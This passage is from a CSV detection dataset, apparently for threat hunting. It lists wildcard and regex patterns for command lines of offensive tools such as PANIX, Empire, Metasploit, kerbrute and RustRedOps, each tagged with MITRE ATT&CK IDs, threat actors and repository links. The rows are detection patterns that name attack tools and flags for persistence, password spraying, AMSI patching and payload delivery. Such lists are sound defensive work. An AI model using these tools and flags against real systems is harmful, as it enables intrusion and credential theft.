"* panix.sh --generator*",".{0,1000}\spanix\.sh\s\-\-generator.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","2512"
"* panix.sh --generator*",".{0,1000}\spanix\.sh\s\-\-generator.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","2513"
"* panix.sh --systemd*",".{0,1000}\spanix\.sh\s\-\-systemd.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","2514"
"* papacat.bat",".{0,1000}\spapacat\.bat","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","2515"
"* papacat.bat",".{0,1000}\spapacat\.bat","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","2516"
"* papacat.ps1*",".{0,1000}\spapacat\.ps1.{0,1000}","offensive_tool_keyword","JustEvadeBro","JustEvadeBro a cheat sheet which will aid you through AMSI/AV evasion & bypasses.","T1562.001 - T1055.012 - T1218.011","TA0005 - TA0040 - TA0010","N/A","N/A","Defense Evasion","https://github.com/sinfulz/JustEvadeBro","1","0","N/A","N/A","8","4","309","25","2024-08-21T23:10:08Z","2021-05-11T06:26:10Z","2517"
"* papacat.ps1*",".{0,1000}\spapacat\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","2518"
"* Parasite Invoke.exe*",".{0,1000}\sParasite\sInvoke\.exe.{0,1000}","offensive_tool_keyword","Parasite-Invoke","Hide your P/Invoke signatures through other people's signed assemblies","T1129 - T1574.002 - T1218","TA0005","N/A","N/A","Defense Evasion","https://github.com/MzHmO/Parasite-Invoke","1","0","N/A","N/A","8","3","207","32","2024-03-10T14:53:59Z","2024-03-07T20:18:42Z","2519"
"* parrot main *",".{0,1000}\sparrot\smain\s.{0,1000}","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","0","#linux","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2520"
"* parrot.run/*",".{0,1000}\sparrot\.run\/.{0,1000}","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","0","#linux","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2521"
"* parrot-backports *",".{0,1000}\sparrot\-backports\s.{0,1000}","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","0","#linux","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2522"
"* parrot-security *",".{0,1000}\sparrot\-security\s.{0,1000}","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","0","#linux","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2523"
"* --passnotreq --domain * --user * --pass *",".{0,1000}\s\-\-passnotreq\s\-\-domain\s.{0,1000}\s\-\-user\s.{0,1000}\s\-\-pass\s.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","N/A","9","8","761","129","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z","2524"
"* PassSpray.ps1*",".{0,1000}\sPassSpray\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","2525"
"* PassSpray.ps1*",".{0,1000}\sPassSpray\.ps1.{0,1000}","offensive_tool_keyword","PassSpray","Domain Password Spray","T1110.003 - T1078","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/Leo4j/PassSpray","1","0","N/A","N/A","10","1","7","3","2025-02-20T10:07:43Z","2023-11-16T13:35:49Z","2526"
"* passwd.py*",".{0,1000}\spasswd\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","#linux","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","2527"
"* --password wordlists/*.txt*",".{0,1000}\s\-\-password\swordlists\/.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","N/A","10","10","1577","93","2025-03-01T15:42:29Z","2023-10-23T15:44:06Z","2528"
"* password.lst*",".{0,1000}\spassword\.lst.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","2529"
"* password_cracker.py*",".{0,1000}\spassword_cracker\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","2530"
"* -PasswordList *",".{0,1000}\s\-PasswordList\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","Invoke-SMBAutoBrute.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","2531"
"* --password-list *",".{0,1000}\s\-\-password\-list\s.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","N/A","10","10","1190","163","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z","2532"
"* --password-not-required --kdcHost *cme*",".{0,1000}\s\-\-password\-not\-required\s\-\-kdcHost\s.{0,1000}cme.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","2533"
"* passwords was bruted*",".{0,1000}\spasswords\swas\sbruted.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#content","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","2534"
"* --passwordsperdelay *",".{0,1000}\s\-\-passwordsperdelay\s.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004 - T1621","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","0","N/A","N/A","9","10","1070","142","2025-03-19T20:36:21Z","2020-09-25T20:57:42Z","2535"
"* -PasswordSpray *",".{0,1000}\s\-PasswordSpray\s.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","2536"
"* passwordspray -d *",".{0,1000}\spasswordspray\s\-d\s.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","0","N/A","N/A","10","10","2872","438","2024-08-20T10:56:06Z","2019-02-03T18:21:17Z","2537"
"* --passwords-to-users *hash*",".{0,1000}\s\-\-passwords\-to\-users\s.{0,1000}hash.{0,1000}","offensive_tool_keyword","autoNTDS","autoNTDS is an automation script designed to simplify the process of dumping and cracking NTDS hashes using secretsdump.py and hashcat","T1003 - T1059 - T1021.002 - T1213","TA0006 - TA0008 - TA0005 - TA0002","N/A","N/A","Credential Access","https://github.com/hmaverickadams/autoNTDS","1","0","N/A","N/A","10","2","109","14","2023-10-31T22:03:58Z","2023-10-30T23:10:58Z","2538"
"* pastehakk.sh*",".{0,1000}\spastehakk\.sh.{0,1000}","offensive_tool_keyword","pastehakk","perform clipboard poisoning or paste jacking attack","T1115","T0001 - T0002 - T0005","N/A","N/A","Phishing","https://github.com/3xploitGuy/pastehakk","1","0","#linux","N/A","7","1","56","10","2020-06-22T01:17:53Z","2020-06-17T19:32:24Z","2539"
"* patch_amsi.exe*",".{0,1000}\spatch_amsi\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","2540"
"* Patch_AMSI.py*",".{0,1000}\sPatch_AMSI\.py.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","2541"
"* Patch_AMSI.vba*",".{0,1000}\sPatch_AMSI\.vba.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","2542"
"* patch_etw.exe*",".{0,1000}\spatch_etw\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","2543"
"* path-mtu.nse*",".{0,1000}\spath\-mtu\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2544"
"* -pathToBloodHoundGraph * -pathToOutputGoFetchPath * -pathToAdditionalPayload *",".{0,1000}\s\-pathToBloodHoundGraph\s.{0,1000}\s\-pathToOutputGoFetchPath\s.{0,1000}\s\s\-pathToAdditionalPayload\s.{0,1000}","offensive_tool_keyword","GoFetch","GoFetch is a tool to automatically exercise an attack plan generated by the BloodHound application.","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","Dispossessor","Discovery","https://github.com/GoFetchAD/GoFetch","1","0","N/A","N/A","10","7","633","99","2017-06-20T14:15:10Z","2017-04-11T10:45:23Z","2545"
"* -PathToDMP *.dmp*",".{0,1000}\s\-PathToDMP\s.{0,1000}\.dmp.{0,1000}","offensive_tool_keyword","powerextract","This tool is able to parse memory dumps of the LSASS process without any additional tools (e.g. Debuggers) or additional sideloading of mimikatz. It is a pure PowerShell implementation for parsing and extracting secrets (LSA / MSV and Kerberos) of the LSASS process","T1003 - T1055 - T1003.001 - T1055.012","TA0007 - TA0002","N/A","N/A","Credential Access","https://github.com/powerseb/PowerExtract","1","0","N/A","N/A","N/A","2","117","14","2025-03-28T10:49:43Z","2021-12-11T15:24:44Z","2546"
"* -PathToGraph *.json -PathToPayload *.exe*",".{0,1000}\s\-PathToGraph\s.{0,1000}\.json\s\-PathToPayload\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","GoFetch","GoFetch is a tool to automatically exercise an attack plan generated by the BloodHound application.","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","Dispossessor","Discovery","https://github.com/GoFetchAD/GoFetch","1","0","N/A","N/A","10","7","633","99","2017-06-20T14:15:10Z","2017-04-11T10:45:23Z","2547"
"* -Payload * -method sysprep*",".{0,1000}\s\-Payload\s.{0,1000}\s\-method\ssysprep.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","2548"
"* --payload * --output * --rawscfile * --smuggle *",".{0,1000}\s\-\-payload\s.{0,1000}\s\-\-output\s.{0,1000}\s\-\-rawscfile\s.{0,1000}\s\-\-smuggle\s.{0,1000}","offensive_tool_keyword","SharpShooter","Payload Generation Framework","T1027 - T1059","TA0042","N/A","N/A","Resource Development","https://github.com/mdsecactivebreach/SharpShooter","1","0","N/A","N/A","10","10","1859","361","2024-08-21T12:09:54Z","2018-03-06T20:04:20Z","2549"
"* --payload * --platform windows*",".{0,1000}\s\-\-payload\s.{0,1000}\s\-\-platform\swindows.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","0","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","2550"
"* --payload * --shellcode_path * --xorkey *",".{0,1000}\s\-\-payload\s.{0,1000}\s\-\-shellcode_path\s.{0,1000}\s\-\-xorkey\s.{0,1000}","offensive_tool_keyword","DNSStager","DNSStager is an open-source project based on Python used to hide and transfer your payload using DNS.","T1071.004 - T1568.002 - T1102","TA0002 - TA0005 - TA0009 - TA0010","N/A","N/A","Defense Evasion","https://github.com/mhaskar/DNSStager","1","0","N/A","N/A","10","7","613","133","2023-05-03T12:25:07Z","2021-04-18T21:58:21Z","2551"
"* -payload *-Lhost *-Lport*",".{0,1000}\s\-payload\s.{0,1000}\-Lhost\s.{0,1000}\-Lport.{0,1000}","offensive_tool_keyword","empire","Empire scripts arguments. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","2552"
"* payload add *",".{0,1000}\spayload\sadd\s.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/its-a-feature/Mythic","1","0","N/A","N/A","10","10","3586","465","2025-04-16T18:01:45Z","2018-07-05T02:09:59Z","2553"
"* --payload CommonsCollections*",".{0,1000}\s\-\-payload\sCommonsCollections.{0,1000}","offensive_tool_keyword","pysoserial","Python-based proof-of-concept tool for generating payloads that utilize unsafe Java object deserialization.","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Resource Development","https://github.com/aStrowxyu/Pysoserial","1","0","N/A","N/A","9","1","9","1","2021-12-06T07:41:55Z","2021-11-16T01:55:31Z","2554"
"* --payload x64/c/ipv6 *",".{0,1000}\s\-\-payload\sx64\/c\/ipv6\s.{0,1000}","offensive_tool_keyword","DNSStager","DNSStager is an open-source project based on Python used to hide and transfer your payload using DNS.","T1071.004 - T1568.002 - T1102","TA0002 - TA0005 - TA0009 - TA0010","N/A","N/A","Defense Evasion","https://github.com/mhaskar/DNSStager","1","0","N/A","N/A","10","7","613","133","2023-05-03T12:25:07Z","2021-04-18T21:58:21Z","2555"
"* --payload_file * --payload_path*",".{0,1000}\s\-\-payload_file\s.{0,1000}\s\-\-payload_path.{0,1000}","offensive_tool_keyword","vRealizeLogInsightRCE","POC for VMSA-2023-0001 affecting VMware vRealize Log Insight which includes the following CVEs: VMware vRealize Log Insight Directory Traversal Vulnerability (CVE-2022-31706) VMware vRealize Log Insight broken access control Vulnerability (CVE-2022-31704) VMware vRealize Log Insight contains an Information Disclosure Vulnerability (CVE-2022-31711)","T1190 - T1071 - T1003 - T1069 - T1110 - T1222","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007","N/A","Black Basta","Exploitation tool","https://github.com/horizon3ai/vRealizeLogInsightRCE","1","0","N/A","Added to cover the POC exploitation used in  massive ransomware campagne that exploit public facing Vmware ESXI product ","4","2","149","22","2023-01-31T11:41:08Z","2023-01-30T22:01:08Z","2556"
"* payload_placement.exe*",".{0,1000}\spayload_placement\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","2557"
"* --payloadcookie *",".{0,1000}\s\-\-payloadcookie\s.{0,1000}","offensive_tool_keyword","SharpSocks","Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell","T1090 - T1021.001","TA0002","N/A","N/A","C2","https://github.com/nettitude/SharpSocks","1","0","N/A","N/A","10","10","482","84","2023-03-15T19:19:30Z","2017-11-10T13:29:08Z","2558"
"* --payload-file pwn.bat*",".{0,1000}\s\-\-payload\-file\spwn\.bat.{0,1000}","offensive_tool_keyword","SplunkWhisperer2","Local privilege escalation or remote code execution through Splunk Universal Forwarder (UF) misconfigurations","T1068 - T1059.003 - T1071.001","TA0004 - TA0003  - TA0008 - TA0011","N/A","N/A","C2","https://github.com/cnotin/SplunkWhisperer2","1","0","N/A","N/A","9","10","250","53","2022-09-30T16:41:17Z","2019-02-24T18:05:51Z","2559"
"* -PayloadPath *",".{0,1000}\s\-PayloadPath\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - 